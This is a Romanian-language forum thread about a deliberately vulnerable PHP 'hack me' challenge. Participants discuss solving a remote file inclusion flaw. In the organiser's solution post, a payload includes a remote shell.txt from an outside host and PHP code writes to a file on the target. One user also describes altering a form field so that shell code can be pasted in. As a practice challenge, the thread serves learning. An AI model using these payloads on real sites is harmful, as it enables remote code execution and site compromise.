very easy hack me (php)

[amprenta]

target : http://pandurii.evonet.ro/rfi.php

realizati un RFI (exprimare de kkt )- o sa primiti o eroare ca n-am gasit host free pe care sa mearga ..ma rog

Ma intereseaza "tactica" voastra .

Ca sa fie totusi mai palpitant daca v-ati prins cum vine aveti un fisier numit spuma.txt , acolo adaugati numele voastru .

Daca credeti ca ati reusit dati un PM sa vedem ce ati facut

Good luck ..

[Nabukadnezar]

cea mai buna metoda e sa asteptam sa rezolve cineva

iar dupa aia sa intram in http://pandurii.evonet.ro/rfi2.php

si sa vedem cum a facut

[Guest BanKai]

rezolvat ... simpla metoda

ups ... am si stricat challengeul

[moubik]

repara-l ca vreau sa-l stric si eu

[amprenta]

"I`ve been hacked" - (".screaming and crying like a little girl"-escalation666)

Am uitat sa mentionez fara deface , iar SharinGod s-a folosit , a exploatat ca sa fim mai in tema , acest lucru

reuploaded pentru moubik .

[tw8]

Dupa cateva minute de munca pe branci si chinuri ... amprenta vezi PM.

http://pandurii.evonet.ro/tw8.txt

Bafta !

[x.o]

[amprenta]

Rezolvare :

Realizati RFI - "faci post la <? include ("http://www.sugete.ro/shell.txt?"); ?>" (flama)

Adaugati numele in spuma.txt - <?php $tw8 = fopen ("spuma.txt", "w+");fwrite($tw8, "tw8's in the game "); (tw8)

..si ceilalti au facut la fel

Cam asta trebuia sa faceti , nu a fost greu mai ales ca nu sa se filtreaza aproape nimic .

[moubik]

auzi sharingad, amprenta vrea un challenge de la tine

edit: ahh, o metoda pe care am folosit-o a fost sa modific pagina o data ce a fost incarcata (cu webdeveloper plugin)

si am transformat din input type="text" in textarea care iti permite sa faci paste pe mai multe linii, si astfel unui shell daca doresti . si submit.

[Joodes]

Care imi poat zice si mie ce inseamana Un RFI ? va rog

[tw8]

Care imi poat zice si mie ce inseamana Un RFI ? va rog

Citeste aici.

Wikipedia rulz 8).